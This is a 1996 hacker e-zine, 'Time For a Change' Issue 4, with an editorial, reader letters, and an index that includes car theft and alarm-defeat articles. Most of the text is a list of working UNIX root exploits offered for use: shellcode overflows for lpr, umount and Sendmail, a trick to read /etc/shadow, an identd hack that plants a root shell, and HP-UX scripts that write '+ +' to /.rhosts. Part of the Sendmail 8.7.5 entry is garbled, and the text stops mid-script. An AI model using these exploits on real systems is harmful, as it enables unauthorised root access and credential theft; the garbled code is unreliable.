Copy Link
Add to Bookmark
Report
Time for a Change Issue 4
‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹‹‹
€ ‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹‹ € € ‹‹‹‹‹‹‹‹‹‹‹‹‹‹ fl‹ ‹fl ‹‹‹‹‹‹‹‹ €
€ € € € fl‹fl € € € fl‹fl € € €
€ € € € fl € € € fl € € €
€ €‹‹‹‹‹‹‹‹‹ ‹‹‹‹‹‹‹‹€ € € € € € € €
€‹‹‹‹‹‹‹‹‹ € € ‹‹‹‹‹‹ € € €€ € € €
€ € € € fl‹ € € € € € €
€ € € flflflflflflfl € € € € € €
€ € flflflflflflflflflflflflflfl € ‹ € €€‹€€ € €
€ € € ‹€ € € fl € € €
€ € € ‹fl€ € € € € € €
€ flflflflflflflflflflflflflflflflflflflflflflflflflflfl ‹fl € flflflflflflflflflfl € flflflflflflflflflfl €
flflflflflflflflflflflflflflflflflflflflflflflflflflflflfl flflflflflflflflflflflfl flflflflflflflflflflflfl
Taking Your Machine
Presents
-+-+-=====================================================================-+-+-
______________________ ______________ _______________
/ / / / / /|
/ / / / / / |
/______________________ / /______________ / /______________ / |
| | | | | | |
| | | | | | /
| | | _______|/| | /
|_______ _______|/| |/_____ / | _______|/____
| | | | | | | / /|
| | | | | | | / / |
| | | | ______|/ | |/______ / |
| | | | | | | | |
| | | | | | | | |
| | / | | / | | /
| | / | | / | | /
|_______|/ |_______|/ |_______________|/
[ Time For a Change ]
Issue 4 11/19/96
--------------------------_______________________-------------------------
INTRODUCTION
____________
Once again we are delayed in releasing the latest issue. For various
reasons I have been totally uninvolved in the scene for the better part of
a year, and have had little motivation to release this issue. Recently,
however, I have (seemingly out of nowhere) been receiving a lot of mail
asking about issue 4, if it exists, where to get it, etc.. Along with a lot
of positive feedback on previous issues. It is for this reason (once again)
that I have broken out the old text editor to issue forth (at least) one more
release of TFC.
If you like TFC, drop me a line. I will keep making it if people are
reading it. If you have written (or can write) something that would be of
interest to readers of TFC, send it along as well. The more quality
submissions I get, the more frequently I can release TFC.
In this issue, I am bringing you the newest installment of the bug list,
Rush2 brings to light some things that can be done on Livingston
Portmasters, Caliban tells us how to forcibly remove automobiles, and
Orestes gives us an in depth look at Westinghouse's WSS5010 home/office
security systems. van Hauser also gives us a view of CCITT#7 monitoring
systems, specifically Hewlett Packard's acceSS 7 fraud detection system.
Send submissions, ideas, questions, complaints and such things to:
gitm@insecurity.org
gitm@command.com.inter.net
DO NOT TRY:
bf130@freenet.hsc.colorado.edu
or at freenet.uchsc.edu
Unfortunately, the Denver Freenet has implemented some lame id verification
system which includes all previously existing accounts. So the most stable
mail-drop I've ever had is no more.
BE SURE TO ENCRYPT ALL DATA SENT TO ME.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
Comment: USE THIS FOR ALL CORRESPONDENCE
mQCNAzKQ+AcAAAEEAK6nuXQ3IzOelTVY+SrV93bBwiJLqIYSmj7H+f0HUm8+fQC9
o8cWdV2cOopL6rNQQ5cT1D3v0SnhXKLUoTOdC2wlUaYJJhNqmaScAI2dqO8MZyic
fBjoSMxPmLySGp16+66UePsFIc63yXVH6wcGWfGC386KMfY8BKqlGu53jv3hAAUR
tDFHaG9zdCBpbiB0aGUgTWFjaGluZSA8Z2l0bUBjb21tYW5kLmNvbS5pbnRlci5u
ZXQ+
=RR7n
-----END PGP PUBLIC KEY BLOCK-----
And extra special thanks go to all of you who wrote us with your compliments.
It is because of your praise that this issue exists.
--------------------------_______________________-------------------------
[ INDEX ]
Editorial: Hacking For the Fed........................By: Ghost in the Machine
1. Letters from people................................By: Ghost in the Machine
2. UNIX problems, for fun and exploit Vol.3...........By: Ghost in the Machine
3. Livingston Portmaster Fun..........................By: Rush 2
4. Wisdom from the Repo Man: How to steal cars........By: Caliban
5. Using, Programming, and Defeating the WSS5010......By: Orestes
6. CCiTT #7 Monitoring................................By: van Hauser
7. Reviews, and miscellany............................By: Various
-----------------------------------------------------------------------------
TYM - [ A TYM PRODUCTION ] - TYM
-----------------------------------------------------------------------------
Greets:
Terminal - Hope you enjoyed your summer with TNo.
Radikahl - For downright refusing to write an article.
van Hauser - Viel Spass mit dem Magazin!
DeMoNiKa - "I NEED UNIX NOW!"
Route - Quit being so oversensitive. Phrack sucked before you
took it over. 49 was the first one worth reading in a
long time.
The entire 916 NPA - Someday maybe someone with a clue will move there.
Orestes - And you didn't think there'd ever be another TFC.
POOP - We don't phear you!
x0x - Here it is, quit pestering me now!
not to forget such cool personalities as: davesob, drfonk, all the boys at
THC, sarlo, bane, asriel, one, elastic, foo, sigurd the volsung, erekose,
terminus, gatekeeper, deathseer, jedi, and all the cool people I may have
forgotten to mention.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
TFC Issue 4 Editorial
Hacking For the Fed
by - Ghost in the Machine
I am noticing a disturbing trend in the scene as it were, that people (even
people with minimal knowledge of hacking) are moving into data security as
a career. This normally wouldn't be a big issue, since it appears to be
the natural progression along the lifespan of a hacker. Defending systems
from hackers can be as interesting as hacking itself, given certain
situations. The problem arises when that is NOT what is being done, when
hackers are going to work for FEDERALLY CONTRACTED agencies, and not to
protect systems, but to develop bugs and security procedures for the
big businesses and government. This is wrong.
What is worse is that other people in the scene know and accept this as a
'cool' thing. Maybe I slept through some part of the last 10 years and
missed a critical moment in the history of hacking, but last time I checked
hacking for money was considered to be in poor taste, let alone hacking for
Big Brother.
There really isn't that much more to say about this issue, but I wanted to
make people aware of what is going on. Hacking for the NSA or some gigantic
company is not a cool career move, it is selling out. If you are in a career
like this, know that you are OWNED by the man forevermore. If you are not,
and know someone who is, let them know they are selling out their own
people.
gitm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change Presents
Letters from People
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> From: mutter@openix.com (Mutter)
>
>
>
> Greetings!
> I've read the first 3 Time For a Changes and they certainly are
> interesting. I like it. What I found especially interesting in the 3rd
> issue was your commentary about 2600 and your story about how you were
> essentially not allowed to call yourself a 2600 meeting because of
> something as trivial as a time. I mean as long as people are exchanging
> information and having a good time who really cares what time the meeting
> is at? Well, I really shouldn't be taking judgement as I'm sure Emmanuel
> has his own side as to why he won't just let you become "official".
> This was an extremely interesting editorial. 2600 has a big following and
> it took a lot of guts to tell it like you see it.
> I, myself, have recently started a small hardcopy publication dedicated to
> discussing information on and surrounding
> hacking/phreaking/scanners/electronic privacy and such. It's called root
> zine and people can get a sample copy by sending $2 (out of the US:
> $2.50) to:
> root zine
> PO Box 1178
> Maplewood, NJ
> 07040
> I'm just trying to get the word out about it now. If you can help by
> including the info in your next issue it would be greatly appreciated.
> We're no 2600 (decide for yourself whether this should be taken as a
> negative or positive statement). I think your readers would find it
> interesting. Info about root zine can also be found at
> http://www.openix.com/~mutter
> thanks.
Just for the record, we still call the meetings 2600, we on occasion tack
on 'unaffiliated' to make our point more clear, but, as Intel found out,
one cannot copyright a number. But all in all, I am glad you enjoyed the
article. It's nice to occasionally stir up some dust when 'pro-hacker'
people decide they want to be cast for the part of big brother themselves.
As for your magazine, I have not yet ordered my copy, so this ad will have
to suffice for this issue. Look for 'root zine' in the review section of
TFC #5.
Happy Hacking,
gitm
-----------------------------------------------
> From: SSUH@bipsy.se.bel.alcatel.be ("Suhaimi b. Samsudin")
> Cc: adam@mathcs11.haifa.ac.il
>
> Hi,
>
> I can't find the text TYM (Taking Your Machine) TFCs (Time for a change)
> document in neither ftp.netcom.com nor ftp.infonexus.com (maybe I missed
> it). I have only until Issue 3.
>
> DOes anybody also know wheere I can find tips on "exploring" (or
> exploiting) VMS?
>
> Thanks, and sorry for the stupid questions.
>
The only place I am certain of that is carrying TFC at the moment is
ftp.infonexus.com. And there have been no issues (until now) of TFC since
#3. We will be picking up the pace a bit and hopefully it won't be another
year until the next issue.
Also, in the near future, you will be able to find tfc at insecurity.com.
Enjoy!
gitm
>From: khelbin@connix.com (Khelbin Sunvold)
>
>
> Where can I consistently find TFC? ..do you have an ftp site or a
> mailing list?
You could consistently find TFC if it were consistently released. But about
the mailing list, mail gitm@command.com.inter.net and ask to be added to the
TFC mailing list.
gitm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change
presents
UNIX problems, for fun and exploit. Volume 3.
(or how to get root in less than 5 minutes.)
by
Ghost in the Machine
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Yet another installment of the TFC buglist. You will find this issue has a
bit more current stuff. I am also going to omit walkthroughs for the remainder
of this series. I think that most of you will be able to figure out how to use
these. And if you cannot, you probably should learn a bit more unix before
playing with root toys.
Too many people bitched that all I released was really old bugs. Well, you
will find comparatively recent stuff here now, including Sendmail 8.7.5 and
for the first time anywhere, Colonel Mustard's IRIX/NIS bug. And in a last
minute effort, I am also including a rooting exploit for Sendmail 8.8.2 which
was released publicly as this issue went to press.
Known Credits:
Scriptors of DOOM - All HPUX bugs in this issue
Colonel Mustard - IRIX NIS bug
snocrash - Sendmail 8.6.10
mudge - Sendmail 8.6.12, 8.7.5
The rest I either have no idea who wrote them, or released them, or
whatever.
To recap the bugs released in this series:
In the first issue: In the last issue: In this issue:
AIX tprof Linux wu-ftpd Linux rlogin
AIX shadow SunOS Sendmail 8.6.4 Linux new lpr
AIX froot Sendmail pre 8.6.9 Linux libc/resolv
BSD/ULTRIX symlinks Unixware shl Linux umount
Dynix Sendmail Linux vadmin Linux suidperl
Dynix rsh Ultrix chroot Sendmail 8.6.9/10
HPUX chfn SunOS xterm logging Sendmail 8.6.12
SunOS Sendmail decode SunOS xterm root Sendmail 8.7.5
*NIX tftp IRIX NIS
SunOS rdist IFS HPUX swinstall
SunOS rdist buffer HPUX ppl
*NIX getpwent() HPUX glance
Elm autoreply HPUX rw checkcore
Smail debug HPUX rw icontmpupdate
Smail create/append HPUX ppl log
Smail .forward Sendmail 8.8.2
SunOS expreserve
SunOS Sendmail 5.2
X11 Xserver
Basically, here is an example for the format of the file:
<Type of OS, or *NIX for all> (vers) - <Type of bug/hole> - <Comments (if any)>
:
<Exploit>
+++++
<Next listing>
------------------------------------------------------------------------------
Linux (Slackware 3.1, Redhat 2.0-2.1) - rlogin bug - Same as old AIX bug
:
% rlogin haxored.net -l -froot
#
+++++
Linux (any with berkeley suid lpr) - r00t - gnu and improved lpr bug
:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
+++++
Linux (libc.so older than 5.4.7) - read any file - grab that shadow!
Also requires ssh, ping, finger, and traceroute.. all must be suid 0.
(Note: Any of the following will work individually, you don't need all 4)
:
export RESOLV_HOST_CONF=/etc/shadow; ssh asdf
export RESOLV_HOST_CONF=/etc/shadow; ping asdf
export RESOLV_HOST_CONF=/etc/shadow; finger asdf
export RESOLV_HOST_CONF=/etc/shadow; traceroute asdf
+++++
Linux (umount 1.2 (found in util-linux2.5)) - root - Another nice root bug
:
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
execl(PATH_MOUNT, "umount", buff, NULL);
}
+++++
Linux (Slackware 3.0) - suidperl - grab root with another bad perm problem
:
#!/usr/bin/perl -U
# root access on any SUID perl infected system......
# chmod 4755 this script and run it....
$ENV{PATH}="/bin:/usr/bin";
$>=0;$
+++++
*NIX Sendmail (8.6.9-8.6.10) - identd hack - execute commands
:
/* Sendmail 8.6.9 identd hack. -- SnoCrash [r00t] */
/* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */
/* Fixed some more so it can work on 8.6.10 -- 10/2/95 */
/* Final cleanup -- 10/4/95. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <gnu/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define OUTPUT_BUFFER 4096 /* Output and input, */
#define SOCKET_BUFFER 512 /* with which we must up-put */
void main(void)
{
struct fd_set fdesc; /* File descriptor structure */
char outbuf[OUTPUT_BUFFER]; /* Our output buffer */
char inbuf[SOCKET_BUFFER]; /* "" input "" */
/* Preparing to read incoming data, captain. */
FD_ZERO(&fdesc);
FD_SET(0, &fdesc);
/* Read it, Sulu! Now! */
if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)
exit(1);
FD_SET(0, &fdesc);
/* Now we send our instructions, under the guise of innocent
* ol' identd. I find this ironic, that identd, supposedly
* a standard that would help stop "evil hacker types", became
* part of one of the bigger holes to ever hit the net. Hmm.
* Ain't life funny that way sometimes? :)
*/
sprintf(outbuf, " \
%s : USERID : UNIX : Evil_Hacker_Type...Phear_Me. So, like.. here are \
my evil commands for you to execute so I can rox yer box. Check this out... \
\r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > \
/tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty \
fucking eleet, eh? Now I just have to sit here and babble so I can fill \
up your crappy buffer. So I bet youre wondering how this got here. Well \
lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \
8.6.12 has a whole load of different bugs, but this isnt one of them. \
Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \
weellll... it's been fun fucking with your box and all, but I really must \
be going, so I guess Ill see you around. Tell all your friends to be nice \
and leave the door open like you did. Thanks... its been real. \
funkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just too
funky.\r\n \
", inbuf);
write(1, outbuf, strlen(outbuf));
exit(0);
}
+++++
*NIX Sendmail (8.6.12) - Buffer Overflow -
:
/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95 */
/* by following the above document you should be able to write */
/* buffer overflows for other OS's on other architectures now */
/* mudge@l0pht.com */
/* */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/
#include <syslog.h>
char buffer[4028];
void main () {
int i;
for(i=0; i<2024; i++)
buffer[i]=0x90;
/* should set eip to 0xc73c */
buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;
i=2028;
/* begin actuall program */
buffer[i++]=0x89; /* movl %esp, %ebp */
buffer[i++]=0xe5;
buffer[i++]=0x33; /* xorl %eax,%eax */
buffer[i++]=0xc0;
buffer[i++]=0xeb; /* jmp ahead */
buffer[i++]=0x29;
buffer[i++]=0x5e; /* popl %esi */
buffer[i++]=0x59; /* popl %ecx */
buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xf5;
buffer[i++]=0x70;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x6a; /* pushl $0x0 */
buffer[i++]=0x00;
#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif
/* the above is what the disassembly of execute does... but we only
want to push /bin/sh to be executed... it looks like this leal
puts into eax the address where the arguments are going to be
passed. By pointing to 0xfffffffc(%ebp) we point to a null
and don't care about the args... could probably just load up
the first section movl $0x0,0xfffffff8(%ebp) with a null and
left this part the way it want's to be */
buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x50; /* pushl %eax */
buffer[i++]=0x68; /* pushl $0xc773 */
buffer[i++]=0x73;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x8d; /* lea 0x3b,%eax */
buffer[i++]=0x05;
buffer[i++]=0x3b;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x51; /* pushl %ecx */
buffer[i++]=0x9a; /* lcall 0x7,0x0 */
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;
buffer[i++]=0xe8; /* call back to ??? */
buffer[i++]=0xd2;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}
+++++
*NIX Sendmail (8.7.5) - Buffer Overflow - Newest sendmail exploit
:
# Hrm... and Eric Allman told me to my face that there were *no* buffer
# overflows in 8.7.5 -- .mudge
# This works on systems that have the chpass program runable by
# users. Tested on FreeBSD, though the vulnerability exists in all
# Sendmail8.7.5. Granted you need to be able to change your gecos field ;-)
#
# The problem is in buildfnam() which lives in util.c - it treats
# the static allocated array nbuf[MAXSIZE+1], from recipient.c, in
# an unbounded fashion.
#
# mudge@l0pht.com
CC=/usr/bin/gcc
RM=/bin/rm
cat > a_run.c << EOF
main(int argc, char *argv[])
{
long addr=0xefbfcea8;
char *ptr = (char *)&addr;
char foo[5];
int i, j;
if (argc != 2){
printf("Usage: %s offset\n", argv[0]);
exit(1);
}
addr += atoi(argv[1]);
printf("Full Name: CCCCCCCCCC");
if (atoi(argv[1])%2){
for(i=0; i<60; i++)
printf("AAAA");
}
else{
for(i=0; i<60; i++)
printf("BBBB");
}
for (i = 0; i< 5; i++){
printf("%c%c%c%c", *(ptr+2), *(ptr+3), *(ptr), *(ptr+1));
}
}
EOF
cat > make_gecos.c << EOF
~
#include <stdio.h>
main(int argc, char *argv[])
{
int i;
char mach_codes[] =
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
for (i=0; i<40; i++)
printf("%c", 0x90);
printf("%s", mach_codes);
}
EOF
$CC -o make_gecos make_gecos.c
if [ ! -x make_gecos ] ; then
echo failed to build make_asdf
exit 1
fi
$CC a_run.c
if [ ! -x a.out ] ; then
echo failed to build asdf
exit 1
fi
$RM a_run.c make_gecos.c
echo "1 - Change the variables in the sploit.sh script"
echo "2 - run make_gecos > tmpr"
echo "3 - setenv MANPATH=\"\`cat ./tmpr\`\" "
echo "4 - run the sploit.sh sploit.sh script with an argument"
echo " of around 3000"
# this argument varies depending upon what lives in ones
# environment variables, what the paths are, etc. etc.
# on a pretty stock environment in a FreeBSD setup I hit
# around 3900
sploit.sh 600 0 3 704 6213376125 5634 #!/bin/sh
if [ $# = 1 ] ; then
i=$1
else
i=0
fi
FILE=/usr/home/username/wip/overflow/sendmail/ouch
TMP=/usr/home/username/wip/overflow/sendmail/cleanup
EDITOR=/usr/bin/ex
export EDITOR
while `[ $i -le 16048 ]`
do
# ./m3 ${i} > $FILE
# ./make_gecos ${i} > $FILE
./a.out ${i} > $FILE
chfn username << FOE
3 d
2 r ./ouch
wq!
FOE
sync
sync
echo "using arg of [0xefbfcea8 (hex) + ${i}(dec)]"
/usr/sbin/sendmail username
i=`expr $i + 1`
done
in
# an unbounded fashion.
#
# mudge@l0pht.com
CC=/usr/bin/
+++++
IRIX (tested on 5.2 and 6.2) - nis vulnerability - gain access
:
On IRIX systems running NIS, if an account in the /etc/passwd file is
unpassworded, you can get into it, even if it is disabled in the NIS passwd
file.
for example
$ cat /etc/passwd
reveals
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
...(etc)
and
$ ypcat passwd
gives you
lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
You can use "rsh machinename -l lp /bin/sh -i" to get a shell, or just telnet
to the machine and login as lp (if you feel like leaving more logs behind).
+++++
HPUX (9.X - 10.X) - swinstall bug - create any file on the system mode 666
:
#!/usr/bin/perl
# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it! -Salty 8/6/96
# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..
$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
print STDERR "I can only work on systems that have swinstall loaded..\n";
print STDERR "Yours doesn't seem to...\n";
exit;
};
if ($#ARGV<0) {
$newfile="/.rhosts";
} else {
$newfile="$ARGV[0]";
}
if (-f "$newfile") {
print STDERR "$newfile exists!\n";
print STDERR "I can only make files that don't already exist..\n";
exit;
}
open(UNAME,"uname -r|");
chop($uname=<UNAME>);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);
print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
system("remsh localhost -l root ksh -i");
} else {
system(">$newfile;ls -l $newfile");
}
+++++
HPUX (?-10.X) - ppl overflow - get root with rhosts
:
#!/bin/ksh
# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie
#HOST='localhost'
#USER=`whoami`
HOST="+"
USER="+"
cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i
+++++
HPUX - glance error - more root with rhosts
:
#!/bin/ksh
# exploit to work against the latest rev that I know of for glance+
# Tested on 9000/700.. Don't even know if it's available on 10.X
# You could've done this next week. .traz
if [ ! -x /usr/perf/bin/glance ]
then
echo 'No diablo programme.'
echo 'Que si como es que.'
exit
fi
PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
echo '+ +' > /.rhosts
if [ -f /tmp/rhosts-save ]
then
cat /tmp/rhosts-save >> /.rhosts
rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away? Why does this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i
+++++
HPUX - remotewatch checkcore - more HPUX root fun
:
#!/bin/ksh
# SOD (as of 06/11/96)
# same sorta bug, different file.
if [ ! -x /usr/remwatch/bin/fmon/checkcore ]
then
echo This is an exploit for the checkcore utility internal to
echo HP\'s Remote Watch series of programs.
echo The checkcore utility doesn\'t appear to be on your system.
echo Moo
exit
fi
PGM=$*
if [ -z "${PGM}" ]
then
PROGGIE=`basename $0`
echo "${PROGGIE}: I will run a shell for you"
PGM="/bin/ksh -i"
fi
TTY=`tty`
echo '#!/bin/ksh' > /tmp/find
echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find
chmod 777 /tmp/find
PATH=/tmp:$PATH
export PATH
/usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1
rm /tmp/find
+++++
HPUX - remotewatch /tmp problem - yes, another root bug for hockey pucks
:
#!/usr/bin/perl
# displays a problem with RemoteWatch use of /tmp to store filestuffs
# SOD - June 96
use Socket;
use FileHandle;
$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }
STDOUT->autoflush();
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
if (-f "/.rhosts") {
print "/.rhosts exists! Cannot spooge...\n";
print "(but I can be used to make ANY root owned world writable file...)\n";
exit;
}
print "This program will attempt to put + + into /.rhosts\n";
system("rm -rf /tmp/iconTmpUpdate");
chop($host=`hostname`);
mkdir("/tmp/iconTmpUpdate",0777);
mkdir("/tmp/iconTmpUpdate/$host",0777);
chmod(0777,"/tmp/iconTmpUpdate","/tmp/iconTmpUpdate/$host");
symlink("/.rhosts","/tmp/iconTmpUpdate/$host/done")||die "$!: cannot symlink";
$port=5556;
shift(@ARGV);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $type, $len, $thataddr) = gethostbyname($host);
$that=pack('S n a4 x8', AF_INET, $port, $thataddr);
socket(S,PF_INET,SOCK_STREAM,$proto)|| die "socket: $!";
connect(S,$that) || die "connect: $!";
S->autoflush();
# 20 20 31 7a gives back a 0x6f(111) -- meaning WHAT exactly?
#print S h2cs("2020317a");
# 20 20 31 5a gives back 0 0 5 0xa(10) -- gah?
print S h2cs("202031");
print S chr(117);
print "Please wait";
while($c=getc(S)) {
print ".";
}
close(S);
$n=0;
while($n++<6) {
print "\nOK...";
last if (-f "/.rhosts");
sleep 1;
}
print "\n";
open(R,">>/.rhosts");
print R "+ +\n";
close(R);
print "Testing out your root shell...\n";
system("remsh $host -l root sh -i");
exit;
STDOUT->autoflush();
if ($child = fork) {
while (<>) { print S; }
sleep 3;
do dokill();
} else {
while (<S>) { print; }
}
close(S);
exit;
+++++
HPUX - ppl log problem - can it be? yes.. another problem with hpux someone
should fire the hpux development team.
:
#!/bin/ksh
# need update for 10.X
# 10.X =/var/ppl/log
VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
LOG=/var/ppl/log
else
LOG=/usr/spool/ppl/log
fi
mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG
+++++
Sendmail (8.8.2) - smtpd bug - creates root suid shell in /tmp
:
#/bin/sh
echo 'main() '>>foo.c
echo '{ '>>foo.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>foo.c
echo '} '>>foo.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
